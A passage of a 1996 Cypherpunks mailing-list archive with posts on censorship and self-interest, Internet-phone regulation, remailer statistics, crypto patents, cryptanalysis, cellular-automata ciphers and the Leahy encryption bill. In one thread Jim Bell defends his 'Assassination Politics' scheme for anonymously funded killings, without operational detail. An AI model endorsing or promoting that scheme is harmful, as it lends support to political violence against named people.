iQEVAwUBMUF6K8iycyXFit0NAQFoBgf/Tt0zFCaRNJFBwZcxsV/v5ABnjjnAtqoT
EDF0OA7+UogWT1MXL8RP58tQ2vTwUWJ1PdK/gdnwlkjpwxC0i4gRx1HpnCLOjRlL
UgkUKu5qiyIWKd6upCYCMd1NCbqaffHjWr3pWxVFE/zPaCQ7mlrZZV4QBeV/bKbU
djt70BQTa7WFvQwZWkVO7QcxOawjzItyZErusdEIvPz03MqbcqSaQu0NgtEy/Zwu
82CSF10uTL96TzjXm1icASiquDk8Tj+go8WqC1FZ8uK3kFHDDkEuLqzXdtG6sJKK
hV4PPfehyjXXXB2CADmXMnXZVLkWU0x5Ig7l/bdOETrPhfl07Di9tQ==
=1OeX
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 10 Mar 1996 04:09:29 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <9603091820.AB14468@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Paul S. Penrod" <furballs@netcom.com> wrote to Declan:

>IF you hold to the premise that self-censorship is based in a 
>large part on witholding your natural inclination and/or reaction
>, then yes the argument can be made that self-censorship occurs 
>all the time. However, I would submit that J.F.A. is correct and
>that your position is but a subset of the original statement.

One problem that arise in all of the discussion around this theme 
is that peoples have very different ideas of the terms "self-
interest" and "selfishness".  The collectivists and mystics have 
made us accept the basic premise that selfishness means "acting
in a way harmfull to others".  They just trained us to blank out
the fact that, as rational animals who love life, our best inte-
rest might very well coincide with the one of our neighboor.

Man, after being a rational animal is also a social animal.

There is plenty of crypto relevency in this discussion and it lies
in the basic view of Man of the individuals in such discussion.

Is Man an intrinsical blood thirsty beast that either kills or cry
or is Man a rational animal that can enjoy life in a peaceful and
constructive and exciting way?

The one who have the first opinion wants more govt, more laws and 
GKE.  The others wants freedom.

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMUGA6MiycyXFit0NAQGlLQf8DxmsCoNvqlmbsvb87/IS5UsZOVFXgdG+
cdLSY9A0UDl7bCPtyKJ5V/kvA8VDiL5H4K/Le9yRD6pYcLWf5S9sHdMhM24odhqy
7/7lIK0ud1+4oD0SIfZyPNcSpJc0AWIMn6E6Xa2K/khtjl9qtKvS+byRyZumExrS
p3ScxHPe2WJvR2wCN7lnrwzLoj8MA8+XaHomOa7pQme7z+YjmM76gi/8lzt9i+J7
tmGz39UfDQx8QAaq0NfVmUelmT80xsDxCmWU19lgdCoY2P8QGjR8pie/gZPdJiXl
LtutVcefHb7cP9gKYXPHwxV4krM2urMhBM2cS469lwQqZY8VYN5NaQ==
=SVWp
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Olson <jolson3@netcom.com>
Date: Tue, 12 Mar 1996 13:16:54 +0800
To: cypherpunks@toad.com
Subject: Please ignore testing Private Idaho
Message-ID: <199603111924.LAA13814@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Did I get through anonymously?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 10 Mar 1996 06:18:46 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
In-Reply-To: <9603091820.AB14468@cti02.citenet.net>
Message-ID: <Pine.3.89.9603091324.A17367-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 9 Mar 1996, Jean-Francois Avon wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> "Paul S. Penrod" <furballs@netcom.com> wrote to Declan:
> 
> >IF you hold to the premise that self-censorship is based in a 
> >large part on witholding your natural inclination and/or reaction
> >, then yes the argument can be made that self-censorship occurs 
> >all the time. However, I would submit that J.F.A. is correct and
> >that your position is but a subset of the original statement.
> 
> One problem that arise in all of the discussion around this theme 
> is that peoples have very different ideas of the terms "self-
> interest" and "selfishness".  The collectivists and mystics have 
> made us accept the basic premise that selfishness means "acting
> in a way harmfull to others".  They just trained us to blank out
> the fact that, as rational animals who love life, our best inte-
> rest might very well coincide with the one of our neighboor.

Well, I'll accept the premise at face value for the moment - as per our 
discussion. The argument points out the blatant spin control exercised on 
the language by those who would "manage" our daily affairs. Orwell was 
correct in his "Newsspeek".

What I can't understand is why it is so difficult for some people to 
understand the difference between discipline and control. Discipline to 
time proven principles of social behavior begets freedom and allows one 
to control themselves rather than the state making it their pervue.

Self-mastery does at least two things (germain to this discussion). 
First, it promotes and awareness in an individual that they can not make 
it alone - thus addressing the social nature of Man. It engenders a 
desire to render service to one's neighbor as it is intuitively 
understood that benefit to one's self is derived from the benefit enjoyed 
by one's neighbor. There is another topical digression I wont go into here.

Second, it reduces the need for governmental control and regulation, 
because order is kept by all, rather than enforced by the few within the 
community. Thus it reduces government pervue to those problems and issues 
that requires a much larger scale of economy than can be achieved 
effectively by the local enclave. The Interstate highway system, 
communication infrastructure, trading policies and national defense are 
items that can be justified at this level of view.

While a bit utopic in view, such a system properly employed would not 
require cryptography to handle communications as the trust would exist in 
the confidential delivery of such communique. However, this world being 
what it is promotes the use of trusted agents for delivery because of 
Man's selfish tendencies...

> 
> Man, after being a rational animal is also a social animal.

The first I would dispute, the second is apparent... :-)

> 
> There is plenty of crypto relevency in this discussion and it lies
> in the basic view of Man of the individuals in such discussion.
> 
> Is Man an intrinsical blood thirsty beast that either kills or cry
> or is Man a rational animal that can enjoy life in a peaceful and
> constructive and exciting way?
> 
> The one who have the first opinion wants more govt, more laws and 
> GKE.  The others wants freedom.
> 
> JFA

I would answer the question this way: Look at a child when it is a 
newborn. It is innocent, completely dependant, and loves unconditionally 
(relatively so). By age 5, at least half the learning this person will do 
in their life time has been accomplished. IT is at this stage that one 
can look at predict the behavior for some time to come (assuming nothing 
drastic changes in the child's next few years of life). Over time they 
loose that natural curiosity and innocence that in large part drove them 
to explore. They form opinions right or wrong about issues both tangible 
and intangible.

In my estimation, the nature of man is clearly delineated by the behavior 
displayed when he first comes into this world: curious, selfish, loving, 
and needy for social contact. All attributes of his character can be 
defined and shaped by these things, the experiences in life and the 
examples set for him by those who are his mentors. If man turns 
predatory, it is because he found that set of behaviors best suit his 
needs of the moment - otherwise he would seek other ways of fullfilling 
those needs. Hence - we are not rational creatures.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 10 Mar 1996 05:06:27 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle  Helmets
Message-ID: <9603091853.AA15821@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>At 10:42 PM 3/8/96 -0800, Bill Frantz wrote:
>>(1) Assassination Politics (AP) will be most useful to a fired-up group of
>>people who want to silence a single person.  Madeline Murray O'Hare comes
>>to mind.  (She was a Texas atheist who challenged school prayer and won.)

I quote this text as an example of an ongoing thought process in
the analysis of the AP scheme.  A little statistical mechanics
would not hurt here.  The above example shows *one* possible
interaction between two entities, each having their own charac-
teristics leading to a given inter- action.  But in all theses 
examples, the specific variables that is forgotten is the time
variable.

What will be the *dynamic* characteristics of such a system.

 - the above paragraph describe an interaction in a given 
   direction.
 - what are the others interactions that could *speed up* the 
   above process
 - what are the others interactions that could *slow down* the
   above process

Any analysis of the problem that blanks out the 
probability of occurence (which happens in the time domain) of
each partial reaction cannot describe the outcome of the scheme.

Proponents of such a scheme should stick a bit more to crypto...

Ehhhh...  What can I say?  Physics is everywhere :)

JFA 
B. Sc. physics
A physicist is a guys/gal that cannot help but see a dance floor
in a crowded bar as an interesting thermodynamical system...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMUGK/MiycyXFit0NAQFZeAf+JzOfyxmQHBw5E6ATx4dYUMXabUTTbt1r
5ifyuwYPQ9Urwz3ONHbOOI7O2CRkBcHfvYalIFvKFwKH4oQGsf/s2mGqKDi1bVX7
hUwk5oKTFPYeBHnrI2i4LglQPiBQMJJsi+ISkKujtCnE6UHR8XHjuPfnQ1FV8amA
o5KF8HJlkVgKMCEiJSsHGBmVQl/WbhM8JIJnPy+iteC+d0wEljr9tCMIxJJ6JWza
r4dzLAP9VPDoSkhK7qSh5AWUVp2Wh0v3p9M4wuE7WzI+Gbha0KgKht9ZEZOx3oVH
SuA0yZ+zfVVib1x4UedG/9rKQ5m0fiYDqJ8xPOWMPXTmo2Ecqad9zA==
=DSc6
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 06:46:10 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle  Helmets
Message-ID: <m0tvWTF-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:45 PM 3/9/96 -0500, Jean-Francois Avon (JFA Technologies, QC, Canada)
wrote:

>>At 10:42 PM 3/8/96 -0800, Bill Frantz wrote:
>>>(1) Assassination Politics (AP) will be most useful to a fired-up group of
>>>people who want to silence a single person.  Madeline Murray O'Hare comes
>>>to mind.  (She was a Texas atheist who challenged school prayer and won.)
>
>I quote this text as an example of an ongoing thought process in
>the analysis of the AP scheme.  A little statistical mechanics
>would not hurt here.  The above example shows *one* possible
>interaction between two entities, each having their own charac-
>teristics leading to a given inter- action.  But in all theses 
>examples, the specific variables that is forgotten is the time
>variable.
>
>What will be the *dynamic* characteristics of such a system.
> - the above paragraph describe an interaction in a given 
>   direction.
> - what are the others interactions that could *speed up* the 
>   above process
> - what are the others interactions that could *slow down* the
>   above process
>Any analysis of the problem that blanks out the 
>probability of occurence (which happens in the time domain) of
>each partial reaction cannot describe the outcome of the scheme.

Ever since I started publicizing my "Assassination Politics" idea, I've 
noticed that self-selected opponents of this idea frequently invent these 
hypothetical scenarios to try to criticize it.  Now, I can't deny that any 
given scenario can happen, but I respond that I don't believe that it 
would occur very frequently, and I usually give reasons why.  I don't 
normally get any kind of challenge to this:  They've shot their wad, so to 
speak.


>Proponents of such a scheme should stick a bit more to crypto...

Well, I agree, but keep in mind that the text you quoted above was 
apparently written by a critic, not a proponent.  

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUH8TPqHVDBboB2dAQG68QP/Uzlblek07Fihu73pDWw/Tf50QK92x4hY
j6qeP0lgnFjn4Y2k3ELYv4DbxpJi5vJM4Z/7CIZZaWJnHSeoT9QBF9D3GG88N/5q
OjGN1Wwe3b4wHmuaEPen5CWEUfAFFE51zdlBknjYWUBqBKOsZ9lfqoMCKGysqshR
gW9UH9zicsA=
=qubI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sun, 10 Mar 1996 05:23:08 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <v02120d03ad677c92f452@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 PM 3/9/96, Mutant Rob wrote:

>Yes... but the Internet is not like HAM radio. The FCC has no
>jurisdiction outside the US, and it would cause various problems
>for them to try to regulate the use of IPhone or how ISPs operate.

        Question of how practical enforcement would be haven't been big in a lot of the legislation we've seen coming out of various capitals, so I doubt the situation for bureaucratic rule-mongering would be much different. The WP article said that has ACTA has "asked the [FCC] to stop this kind of communications and study how to regulate it," probably--and not surprisingly --in that order. 
        It looks like another case of trying to saddle ISPs with impossible enforcement burdens, though in this case one that a lot of ISPs might not mind so much, given the bandwidth that netphone usage eats up (cf. xs4all, I hear, has forbidden users to run CU-SeeMe).
        Q: Is it practically possible to find netphone traffic on a generic network at any level above the source and target addresses? 

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Mar 1996 22:02:26 +0800
To: cypherpunks@toad.com
Subject: Boycott TCSM
Message-ID: <199603091330.OAA27374@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Posted to alt.security:
Crypto relevance - TSCM are a counter-intelligence site with an attitude.


I need some advise of Latent prints.

Just got a assignment from a client concerning a large qty of
empty "Ziploc" and Glazine <sp?> packets found around the plant.

Most of the packets test positive (Nik-Kit) for Meth (Biker Crank), the problem
is that I am having a tough time pulling decent prints off the little envelopes.

Any suggestions??

I am going to try Nile Red (530nm) in ethanol instead of Rhodamine 6G, any
thoughts or experiences??

And yes the plant has a full ten finger set on all employees, all we have
to do is provide photos of any (9 point) prints <groan>

-jma

===============================================================
James M. Atkinson          "...Shaken, not Stirred..."
TSCM.COM
127 Eastern Avenue #291
Gloucester, MA 01931-8008
URL: http://www.tscm.com/      E-Mail:  jmatk@tscm.com
===============================================================
The First, The Largest, The Most Popular, and the Most
Complete TSCM Counterintelligence Site on the Internet
===============================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 10 Mar 1996 05:44:15 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: frequency of remailer use?
Message-ID: <Pine.SUN.3.91.960309145525.7341I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would be very grateful for pointers to data concerning the number of
messages that pass through remailers.  (Not anon.penet.fi -- real
remailers.) I am currently in a conversation with a journalist who should
know better, but claims that secure anonymous remailers are never used by
anyone -- just a curiosity. 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Mar 1996 05:41:50 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
In-Reply-To: <199603082231.RAA11593@homeport.org>
Message-ID: <199603092000.PAA16523@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Is RSA now saying that the original Diffie-Hellman patent
> (#4,200,770) is not valid?

A hoot, ain't it?

> I'm curious, because in the past, as I understand things, RSA has
> said that the DH patent covers El Gamal.  If RSA no longer considers
> DH to be a valid patent, that would mean El Gamal is not patent
> encumbered.

It all matters very little to me, as the patents expire next year.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 10 Mar 1996 07:46:27 +0800
To: Adam Shostack <baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
Message-ID: <199603092330.PAA25299@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain









At 05:31 PM 3/8/96 -0500, Adam Shostack wrote:
>	Is RSA now saying that the original Diffie-Hellman patent
> (#4,200,770) is not valid?  I'm curious, because in the past, as I
> understand things, RSA has said that the DH patent covers El Gamal.
> If RSA no longer considers DH to be a valid patent, that would mean El
> Gamal is not patent encumbered.

That is what this court decision says:  If Diffie-Hellman does not cover
RSA, then it does not cover El Gamal either.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Mar 1996 06:51:35 +0800
To: Marc North <mnorth@netcom.com>
Subject: Re: Index of Coincidence
In-Reply-To: <Pine.SUN.3.91.960309113033.18346B-100000@netcom12>
Message-ID: <199603092025.PAA16611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Marc North writes:
> I'm looking for detailed information on a statistical tool to aid in
> cryptanalysis called an "index of coincidence".  I would appreciate it if
> someone could please explain what this is, how one builds such an index
> against a given ciphertext, and how it is valuable in the cryptanalysis of
> said ciphertext. 

There is a fairly good general description in "The Codebreakers";
there is also a book by Friedman available from Agean Park Press that
covers the topic. I don't know of any public tools to do the work,
but it isn't very hard...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 10 Mar 1996 08:32:22 +0800
To: tcmay@got.net
Subject: Re: Fractals, Cellular Automata, and Encryption
In-Reply-To: <ad63bf5600021004e133@[205.199.118.202]>
Message-ID: <tWhQx8m9LsaQ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ad63bf5600021004e133@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> Steven Wolfram had some speculations about using fractal or cellular
> automata-based systems for a new kind of cipher. His paper is in one of his
> books ("Theory and Application of Cellular Automata"), but it doesn't
> really get beyond just speculating. And, I recall that someone proved
> several years ago that Wolfram's CA-based encryption scheme was formally
> equivalent to a linear congruential generator.
> 
> I think I included a few paragraphs on this topic in my Cyphernomicon.

Schneier has a few words to say about cellular automata in the first edition
of APPLIED CRYPTOGRAPHY (I don't have the 2nd, shame on me).

Howard Gutowitz published and patented in 1992 a symmetric block cipher
algorithm, based on cellular automata, called CA-1.1 .  There are a
couple of CA-based hash algorithms.  CA-based PRNGs have been shown to
be isomorphic to linear feedback shift register RNGs (not linear
congruential generators, despite what Tim says) and so are subject to
the same security woes as LFSRs.

- -- 
Alan Bostick               | I'm laughing with, not laughing at.
mailto:abostick@netcom.com | The question is, laughing with WHAT?
news:alt.grelb             |      James "Kibo" Parry <kibo@world.std.com>
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMUIZgeVevBgtmhnpAQG3YQL+PUxnW30lCOTfqN5JmrB6RSWD0c/pZbNU
0qijNq0Ka0i+yDBVkbgR8Gdd+vyS6gZKzpbWQxuvv1Xrqg7aeuh/0nEnTLSclpfB
AJShGFEVN1+XSs7zLWIHdQ0CdM/ZSuKL
=JuFk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 10 Mar 1996 05:56:29 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <960309162011_346243269@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-08 15:17:39 EST, you write:

>The difference between the two methods is, as I said before, exactly
>the same as the difference between TCP/IP and UUCP.  Hiding info in
>images or sound files works fine for "email" or file storage but has
>no chance of being an interactive protocol, sometimes you need to
>get things done in real-time.

Haven't you ever heard of IPhone, Nautilus, or PGPfone?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 10 Mar 1996 06:50:06 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: frequency of remailer use?
In-Reply-To: <Pine.SUN.3.91.960309145525.7341I-100000@viper.law.miami.edu>
Message-ID: <Pine.LNX.3.91.960309162300.1148A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Mar 1996, Michael Froomkin wrote:

> I would be very grateful for pointers to data concerning the number of
> messages that pass through remailers.  (Not anon.penet.fi -- real
> remailers.) I am currently in a conversation with a journalist who should
> know better, but claims that secure anonymous remailers are never used by
> anyone -- just a curiosity. 

For most remailers, you can get the usage statistics by sending a message
to the remailer with the subject line "remailer-stats."

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUH3YLZc+sv5siulAQESwQQAsA7VqqGi1la+4/jcMG7Qqz3jAVLSU0+x
CR0TCJE7DPxY+C+IscBTv98BB0z9NiJei/kNgJnIjJze4xLBXj1AHJ4W5O8WRkjV
HMJTawXiCbkvaJ1NztyQwBDsgJkmkWg3kFSR8HQUyRXaaB3+11zyg2poZf4aSu1e
XrK2C/5j0oc=
=DtAu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 10 Mar 1996 10:19:29 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: rhetorical trickery
In-Reply-To: <199603090231.VAA01548@bb.hks.net>
Message-ID: <199603100055.QAA22483@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> there is an infamous case of a child pornographer or pedophile in
>> California that is sometimes cited by law enforcement representatives
>> as a good example of the evils of encryption: supposedly he encrypted
>> his diary and it couldn't be unlocked by them. this was mentioned in
>> the article.
>> 
>> but I have a question: how did they know it was his diary?
>
>If I remember some earlier discussion about that case from a few years
>ago, the file was called "diary.pgp".

how did they know it was *his* diary?

granted, this is highly suggestive, but again not conclusive.
it could be his friend's diary, or a diary of his flowertending,
or whatever.

sure, a government agent could insist, "well, don't be a bonehead.
it's obviously his diary, and surely contains all his crimes against
children".

ah yes, just as, obviously, even before trial, "the man is a criminal"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 11:08:12 +0800
To: cypherpunks@toad.com
Subject: Leahy's guillotine.
Message-ID: <m0tvZUN-0008zCC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To:  All


Recent Senate crypto bill
 Mr. LEAHY (for himself, Mr. BURNS, and MRS. MURRAY) introduced the
  following bill; which was read twice and referred to the Committee

[stuff deleted]

2804. Unlawful use of encryption to obstruct justice

  Whoever willfully endeavors by means of encryption to obstruct,
   impede, or prevent the communication of information in furtherance
   to a felony which may be prosecuted in a court of the United States,
   to an investigative or law enforcement officer shall...


I think we may reasonably assume that this section was very carefully 
written, and thus it may contain meanings (or avoid containing meanings) 
that only a careful reading will disclose.  

Contrary to some other sloppy  interpretations that I've seen here recently 
from organizations that ought to know better, I see nothing in this section 
that limits the prosecution on this law to people who are actually 
participating in a crime.  This distinction is vital.   While the sentence 
is not diagrammed, it appears to be the INFORMATION which is in "furtherance 
to a felony," not the "obstructing" of that communication.  The implication 
is that it is not necessary that a person know the exact information 
involved or be able to decrypt it; he needs only be deliberately using 
encryption to prevent the knowledge of what the information is about, or its 
routing.  (As in an encrypted anonymous remailer, for instance.) 

Moreover, the errors among the organizations that are now apparently 
declaring their general support for this amendment are apparently based on a 
false view of the effects of this section.  

Aside from this, it isn't clear what is meant by the phrase, "obstruct, 
impede, or prevent the communication of information in furtherance to a 
felony."    An obvious problem is this:  How will they know if the use of 
encryption actually had that effect?  If it was UNsuccessful, then obviously 
that encryption did not prevent the government from obtaining information.  
If it was SUCCESSFUL, then how is the government to know that the 
communication in question was "in furtherance to a felony"?  Even if they 
can prove the felony by other means, how can they show that the 
communication actually had anything to do with the crime?

Another problem:  Encryption, per se, does not "prevent the communication of 
information."  What it does, of course, is to prevent the UNDERSTANDING of 
that information.  Do the writers of this bill intend to use this law to 
punish the LATTER effect, rather than the former? 

Further, how is the person to be charged to know if his use of encryption 
had the effect of "obstruct[ing], imped[ing], or prevent[ing] the 
communication of that information?  If he encrypts a file to his hard disk, 
and he doesn't intentionally send the file to the cops, how is he supposed 
to anticipate that the use of encryption had this effect?  As far as HE 
knows, it was simply his decision to not send the file to the cops; he can't 
be expected to know that they'll show up the next morning with a search 
warrant and take his computer, can he?  Would his refusal to provide the 
decrypt key constitute a violation of this section?


Or, if he sends that file to another person, and the cops happen to be 
(secretly) listening in, how is he to know?  Does their inability to decrypt 
that information constitute a violation of this section?  After all, the 
cops did indeed get the encrypted file; they simply don't know what to do 
with it!  They are already "impeded" in UNDERSTANDING that file; a broad 
interpretation of this law would make the person who is wiretapped, as well 
as the person to/from whom the file is send, guilty of this crime.


I'll be blunt, because it's what I do best:  Anybody who reads this section 
of the bill and is NOT worried about its myriad possible interpretations is 
a fool or worse.  I'd welcome a lawyer's interpretation of this law, but I 
suspect he'd be just as worried as I am:  This section is a disaster waiting 
to happen; it is genuinely a Pandora's box that is just waiting to be opened 
by some sleazy prosecutor.

Further, any organization with even a shred of credibility that does not 
condition its support for this bill on the complete removal of this section 
is doing the rest of us an extreme disservice:  It is trading on and risking
its 
reputation, because many of them are issuing opinions of this section of the 
bill with assurances that it will only be used against "guilty" people, when 
there is simply no way to know if this is going to be true.


Wake up, people.  These days, the only difference between a limousine and a 
tumbrel is the destination...

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto








-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUIpdPqHVDBboB2dAQHoxgP/W3QVLGB4xfRQVVf/Udh+sa72Jhy64ON1
Gp2tfiTRYN1LkbpicZI84Hl2m0P2+D3cCCwEL87FDJgKOz2VFHowhGB+cQYIbw5X
te3JNT+DFJQ5y+rdDptnraZkToWJIqVFohOguKP3uPi0lQVK5J331QlfQrt1Fuxi
qpVf/zAE5yI=
=dpTg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 06:54:53 +0800
To: cypherpunks@toad.com
Subject: Why the phone companies are going after Internet phones?
Message-ID: <01I255H0C7HCAKTUFI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I suspect that the below bit of information may explain why the phone
companies are going after regulation of the Internet phone market.
	-Allen

-----------------
   Reuters New Media
   
[...]

   _ Friday March 8 6:04 PM EST _
   
Firms to Offer Computer to Telephone System

[...]

   NEW YORK (Reuter) - Two New Jersey companies said Friday they have
   developed technology that will allow voice conversations via the
   Internet between users of computers and ordinary telephones.
   
   The two companies, VocalTec Inc. of Northvale, and Dialogic Corp. of
   Parsippany, said they expect the system to be available in the next
   few months.
   
   The company said the computer-to-telephone connection, known as the
   Internet Phone Telephony Gateway, will allow computer users to place
   calls to normal local, long-distance or international telephone users.
   
   
   Internet-based phone communication presents a low-cost alternative to
   traditional telephone communications handled by local and
   long-distance carriers.
   
   It enables callers to combine the low cost of Internet connections,
   the convenience of initiating calls from either PCs or telephones, and
   the ability to communicate with anybody with a telephone via the
   public switched telephone network.
   
   However, the Internet poses technical problems such as variable voice
   quality and momentary speaking delays that preclude, at least for now,
   any widespread replacement of existing phone networks by Internet
   telephone communications.
   
   VocalTec chairman Elon Ganor said the software provides the
   conversational quality of a good cellular phone connection, but the
   quality may vary depending on the sophistication of the Internet
   access company providing the local connections.
   
   He said the Internet telephone gateway is expected to be available as
   a complete system in the second quarter of this year.
   
[...]

   The product will be available to third party product developers to
   incorporate into their own products.
   
   Ganor said the products will be sold through Dialogic and Vocaltec's
   existing networks of resellers, system integrators and direct
   channels.
   
   VocalTec said the Internet Phone Telephony Gateway will enable new
   applications that use the Internet as a low-cost network for
   computer-to-telephone and phone-to-phone calls.
   
   Calls to wireline and cellular phones are possible.
   
   The system is comprised of a PC running Windows 95 and the VocalTec
   gateway software and a Dialogic computer telephone adapter card and
   linked to the telephone network and the Internet through a 28.8
   kilobit or faster modem connection.
   
   The new software complements the company's existing Internet telephone
   software, which currently can only connect one personal computer user
   to another.
   
   ``The availability of the Internet as an open, global information
   network has generated considerable interest from our customers,'' said
   Bob Heymann, vice president of business development at Dialogic.
   
   ``The Internet Telephony Gateway will enable (resellers) and systems
   integrators to offer innovative applications such as international
   'hop off' and Internet-based customer service,'' he said.
   
   Dialogic is a leading maker of add-on computer hardware circuit boards
   that enable computers to function as telephones.
   
[...]
   
   VocalTec is headquartered in Herzliya, Israel and has U.S. offices in
   Northvale, N.J. It went public Feb. 7, 1996.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 10 Mar 1996 07:01:27 +0800
To: cypherpunks@toad.com
Subject: re: FCC & Internet phones
